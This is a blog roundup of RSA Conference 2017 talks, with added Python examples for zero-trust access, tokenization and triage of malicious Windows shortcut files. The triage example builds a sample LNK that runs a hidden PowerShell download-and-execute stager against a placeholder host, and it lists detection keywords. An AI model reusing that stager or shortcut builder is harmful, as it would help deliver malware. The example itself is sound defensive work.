RSA Conference 2017 is over and a ton of roundups are being written, so here's mine. As expected, the hottest security topics and vendors were related to IoT and the cloud. Threat intelligence and SOCs were also the subject of conversation with many vendors on the floor. Below are my top 10 key takeaways:
1. CSA Summit: The Summit was the day before RSA and the key theme throughout the day was levels of trust: identities, devices and roles. But the biggest takeaway was the release of the publication from the Software Defined Perimeter (SDP) Working Group, exploring how the SDP can be applied to Infrastructure-as-a-Service environments. Download your copy here.
2. Google’s BeyondCorp: Google has moved its security perimeter from the network to individual users and devices through its groundbreaking “BeyondCorp” initiative. The talk laid out three core principles:
- Connecting from a particular network must not determine which services you can access.
- Access to services is granted based on what we know about you and your device.
- All access to services must be authenticated, authorized and encrypted.
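The CSA theme of trust levels for identities, devices and roles and the three BeyondCorp principles above come together in the access-proxy decision. The following is an added example, not Google's code or any published BeyondCorp policy: the tier names, the device checks and the per-service requirements are assumptions made for illustration. The point it shows is that the same engineer is refused on the office LAN with an unmanaged laptop and allowed from a coffee shop with a managed one, because the source address never enters the decision.

```python
from dataclasses import dataclass
from typing import Optional, Set, Tuple

# Trust tiers and service requirements are assumptions for this example,
# not Google's actual tier names or policy.
TIER_RANK = {"untrusted": 0, "basic": 1, "privileged": 2, "high": 3}

SERVICE_POLICY = {
    "wiki":        {"min_tier": "basic",      "groups": {"employees"}, "mfa": False},
    "source-repo": {"min_tier": "privileged", "groups": {"engineers"}, "mfa": False},
    "prod-admin":  {"min_tier": "high",       "groups": {"sre"},       "mfa": True},
}


@dataclass
class Device:
    device_id: str
    inventoried: bool      # known in the device inventory, i.e. managed
    cert_valid: bool       # presented a valid device certificate in the TLS handshake
    disk_encrypted: bool
    patched: bool          # OS at the required patch level


@dataclass
class User:
    username: str
    groups: Set[str]
    mfa_verified: bool


@dataclass
class Request:
    user: Optional[User]
    device: Optional[Device]
    service: str
    source_ip: str         # logged for audit, never used for the decision
    encrypted: bool        # request arrived over TLS


def device_tier(device: Optional[Device]) -> str:
    """Derive a trust tier from what we know about the device."""
    if device is None or not (device.inventoried and device.cert_valid):
        return "untrusted"
    if device.disk_encrypted and device.patched:
        return "high"
    if device.disk_encrypted:
        return "privileged"
    return "basic"


def authorize(req: Request) -> Tuple[bool, str]:
    """Access-proxy decision implementing the three principles."""
    # Principle 3: every request must be encrypted and authenticated.
    if not req.encrypted:
        return False, "refused: not over TLS"
    if req.user is None:
        return False, "refused: unauthenticated"
    policy = SERVICE_POLICY.get(req.service)
    if policy is None:
        return False, f"refused: unknown service {req.service}"
    # Principle 1: req.source_ip is deliberately never consulted here.
    # Principle 2: the decision is a function of user and device state only.
    tier = device_tier(req.device)
    if TIER_RANK[tier] < TIER_RANK[policy["min_tier"]]:
        return False, f"refused: device tier {tier} below {policy['min_tier']}"
    if not (req.user.groups & policy["groups"]):
        return False, "refused: user not in an authorized group"
    if policy["mfa"] and not req.user.mfa_verified:
        return False, "refused: MFA required"
    return True, f"allowed: {req.user.username} on {tier} device"


# Constructed scenarios: the same engineer on different devices and networks.
ENGINEER = User("alice", {"employees", "engineers"}, mfa_verified=False)
MANAGED_LAPTOP = Device("lt-0042", True, True, True, True)
PERSONAL_LAPTOP = Device("unknown", False, False, True, True)

# On the corporate LAN but on an unmanaged laptop: refused.
FROM_OFFICE_UNMANAGED = Request(ENGINEER, PERSONAL_LAPTOP, "source-repo", "10.1.2.3", True)
# From a coffee shop on the managed laptop: allowed.
FROM_CAFE_MANAGED = Request(ENGINEER, MANAGED_LAPTOP, "source-repo", "203.0.113.7", True)

if __name__ == "__main__":
    for req in (FROM_OFFICE_UNMANAGED, FROM_CAFE_MANAGED):
        print(req.source_ip, req.service, authorize(req))
```

The device tier is the piece that does the real work: it is recomputed on every request from inventory and certificate state, so a laptop that falls out of compliance loses access without anyone touching firewall rules.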
3. Mirai Botnet: Chris Young of Intel Security, in an opening keynote, showed us how McAfee researchers bought an “off-the-shelf” DVR known to be targeted by the Mirai botnet. Within 60 seconds of connecting it to the Internet, the device was compromised. His keynote can be seen here.
4. Cryptographer’s Panel: Adi Shamir, the “S” in RSA, stated: “I'm skeptical that Artificial Intelligence (AI) will have much of an impact on security… If you talk about 15 years from now, when AI systems are going to be super intelligent, I can foresee when you give all of the information about cybersecurity to the AI and it will think about it and then say, in a very calm voice, ‘In order to save the internet, I'll have to kill it.’” To view the panel talk go here.
5. SANS: Four SANS experts took the main stage to talk about the seven most dangerous cyberattacks. Some notable items were: software developers are not properly validating the remote network services their code depends on, and the Internet Storm Center is seeing continuous scanning for vulnerable NoSQL databases. Lastly, there are still folks not changing default passwords. Go here to view the talk.
6. GDPR: The General Data Protection Regulation (GDPR) was discussed in a few talks. At a very high level, it states that organizations must know what data they have and understand the risk that it poses. Johannes Ullrich of the SANS Institute advised that tokenization is the best answer for data protection. The regulation becomes enforceable in May 2018, after which companies potentially face fines for noncompliance.
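To make the tokenization advice concrete, here is an added example (mine, not Johannes Ullrich's or any vendor's implementation) of a minimal token vault. The field names, the `pii-reader` role and the sample record are assumptions. The design choice worth noticing is that tokens are random rather than hashes: two records with the same e-mail get different tokens, so nothing can be learned from the tokenized data without the vault, and erasing a mapping in the vault voids every copy of that token elsewhere.

```python
import secrets
from typing import Dict, Set

# Fields treated as personal data in this example's assumed data inventory.
PII_FIELDS = ("name", "email", "iban")


class TokenVault:
    """Maps random tokens back to original values. In production the vault is
    a separately secured store; here it is an in-memory dict (assumed)."""

    def __init__(self) -> None:
        self._store: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        # A fresh random token per call. Unlike a hash, this cannot be
        # brute-forced for low-entropy values such as e-mail addresses, and
        # identical values do not produce identical tokens.
        token = "tok_" + secrets.token_urlsafe(16)
        self._store[token] = value
        return token

    def detokenize(self, token: str, caller_roles: Set[str]) -> str:
        # Re-identification is the privileged operation; gate it on role.
        if "pii-reader" not in caller_roles:
            raise PermissionError("caller may not detokenize")
        return self._store[token]

    def erase(self, token: str) -> None:
        # Erasure request: drop the mapping and every stored copy of the
        # token becomes meaningless, with no change to downstream systems.
        self._store.pop(token, None)


def tokenize_record(record: dict, vault: TokenVault) -> dict:
    """Return a copy of the record with PII fields replaced by vault tokens."""
    return {k: vault.tokenize(v) if k in PII_FIELDS else v for k, v in record.items()}


def detokenize_record(record: dict, vault: TokenVault, caller_roles: Set[str]) -> dict:
    """Reverse tokenize_record for an authorized caller."""
    return {k: vault.detokenize(v, caller_roles) if k in PII_FIELDS else v
            for k, v in record.items()}


def can_detokenize(vault: TokenVault, token: str, caller_roles: Set[str]) -> bool:
    """True only if the caller is authorized and the mapping still exists."""
    try:
        vault.detokenize(token, caller_roles)
        return True
    except (PermissionError, KeyError):
        return False


# Constructed sample record (no real person).
SAMPLE = {"customer_id": 4711, "name": "Ada Example", "email": "ada@example.invalid",
          "iban": "XX00 0000 0000 0000 0000 00", "plan": "pro"}

if __name__ == "__main__":
    vault = TokenVault()
    safe = tokenize_record(SAMPLE, vault)
    print(safe)                                            # tokens in place of PII
    print(detokenize_record(safe, vault, {"pii-reader"}))  # original record back
```

Analytics and support systems then work with the tokenized record, and only the vault, with its own access control and audit log, ever holds the personal data.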
7. Hacking Exposed: The Hacking Exposed presentations by the CrowdStrike folks never disappoint, and this year they featured “Real-World Tradecraft of Bears, Pandas and Kittens.” My favorite hack they demonstrated was the malicious LNK file. It embedded a PowerShell command and its payload inside a Windows shortcut (LNK) file. The full presentation is posted here.
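A shortcut file is a structured binary (the ShellLink format), so the two things a responder wants from a suspect LNK, the command line it runs and whether anything is appended after the documented structures, can be pulled out without opening it on Windows. The following is an added example written for this post, not CrowdStrike's tooling or any sample from the talk: it builds a constructed benign and a constructed malicious shortcut in memory, walks the header, StringData and ExtraData sections, decodes a `-EncodedCommand` argument, and reports the bytes left over after the terminal block. The marker list is an assumed, non-exhaustive set of heuristics.

```python
import base64
import struct

# Layout constants from the ShellLink binary format ([MS-SHLLINK]).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_DATA_ORDER = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the window minimized
# Heuristic markers for PowerShell stagers (assumed, non-exhaustive list).
MARKERS = ["powershell", "-enc", "-encodedcommand", "-w hidden", "windowstyle hidden",
           "bypass", "iex", "invoke-expression", "downloadstring", "frombase64string"]


def build_lnk(relative_path, arguments="", show_command=1, name=None, trailing=b""):
    """Build a minimal Unicode ShellLink: header, StringData, terminal ExtraData
    block, then any appended bytes. Used only to construct sample input."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0) \
        | (HAS_NAME if name is not None else 0)
    header = struct.pack("<I16sIIqqqIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    values = {"name": name, "relative_path": relative_path, "arguments": arguments}
    body = b"".join(struct.pack("<H", len(values[k])) + values[k].encode("utf-16-le")
                    for flag, k in STRING_DATA_ORDER if flags & flag)
    return header + body + b"\x00\x00\x00\x00" + trailing


def parse_lnk(data):
    """Walk the ShellLink structures; return StringData, ShowCommand and the bytes
    left after the ExtraData terminal block (where an embedded payload would sit)."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    (show_command,) = struct.unpack_from("<I", data, 60)
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # uint16 size, then the IDList
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                    # uint32 size that includes itself
        offset += max(4, struct.unpack_from("<I", data, offset)[0])
    strings = {}
    for flag, key in STRING_DATA_ORDER:          # each: uint16 count, then chars
        if flags & flag:
            (count,) = struct.unpack_from("<H", data, offset)
            width = 2 if flags & IS_UNICODE else 1
            raw = data[offset + 2:offset + 2 + count * width]
            strings[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            offset += 2 + count * width
    while offset + 4 <= len(data):               # ExtraData blocks; size < 4 terminates
        (block_size,) = struct.unpack_from("<I", data, offset)
        offset += block_size if block_size >= 4 else 4
        if block_size < 4:
            break
    return {"show_command": show_command, "strings": strings, "trailing": data[offset:]}


def decode_encoded_command(arguments):
    """Decode the base64 UTF-16LE script behind -enc / -EncodedCommand, if any."""
    tokens = arguments.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand", "-ec"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except ValueError:                   # bad base64 or not UTF-16
                return None
    return None


def triage_lnk(data):
    """Indicators a responder wants from a suspect shortcut."""
    info = parse_lnk(data)
    args = info["strings"].get("arguments", "")
    decoded = decode_encoded_command(args)
    haystack = (args + " " + (decoded or "")).lower()
    hits = [m for m in MARKERS if m in haystack]
    trailing = len(info["trailing"])
    return {"target": info["strings"].get("relative_path", ""), "arguments": args,
            "decoded_command": decoded, "marker_hits": hits,
            "starts_minimized": info["show_command"] == SW_SHOWMINNOACTIVE,
            "trailing_bytes": trailing, "suspicious": bool(hits) or trailing > 0}


# Constructed samples (not real malware): a plain shortcut, and one that runs a
# hidden PowerShell stager and carries bytes appended after the terminal block.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
BENIGN_LNK = build_lnk(r"..\..\Windows\notepad.exe")
MALICIOUS_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-nop -w hidden -ep bypass -enc "
              + base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii"),
    show_command=SW_SHOWMINNOACTIVE, name="Quarterly report",
    trailing=b"PAYLOAD" + b"\x90" * 64)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        print(label, triage_lnk(blob))
```

Real shortcuts usually carry a LinkTargetIDList, LinkInfo and several ExtraData blocks; the parser skips those by their size fields, which is why `trailing` lands exactly on whatever was appended after the terminal block rather than on legitimate metadata.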
8. Containers: If you are into containers, Tsvi Korren of Aqua showed us how he escaped from a container. If you are wondering what a container is, it is a form of application deployment that makes a process tree "think" it has a complete operating system to itself, while it actually shares the host's kernel, which is exactly why an escape matters.
9. Microsoft: Brad Smith of Microsoft noted that 74% of businesses expect to be breached this year and that 90% of intrusions begin with a phishing email. He stated, “every company has at least one person who will click on anything.”
10. DevOps: Josh Corman of the Cyber Statecraft Initiative pointed out the need for governance in DevOps. To get his message out he used a great analogy: in the span of two months, two massive earthquakes struck Haiti and Chile. The Haiti earthquake resulted in the loss of 230,000 lives, but the more powerful one that hit Chile resulted in far fewer deaths. Why is that? Chile planned for disaster by having a robust set of building codes. Haiti had no apparent building code.